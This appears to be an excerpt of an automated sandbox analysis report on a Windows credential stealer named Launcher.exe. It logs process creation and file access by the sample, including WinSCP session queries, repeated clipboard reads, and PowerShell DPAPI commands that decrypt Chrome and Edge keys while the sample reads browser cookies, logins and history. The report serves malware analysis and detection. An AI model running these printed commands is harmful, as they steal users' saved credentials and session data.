        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostnameJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 "Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3D45.tmp" "c:\Users\user\AppData\Local\Temp\anq2mtqn\CSCF5995D8BF694D46AD6A4558D7F1AF.TMP"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ClipboardJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'currentuser')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'currentuser')
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'currentuser')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'currentuser')
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'currentuser')"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'currentuser')"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'currentuser')Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'currentuser')Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\Desktop\Launcher.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pkg VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Roaming\temp.ps1 VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data_tmp VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformationJump to behavior
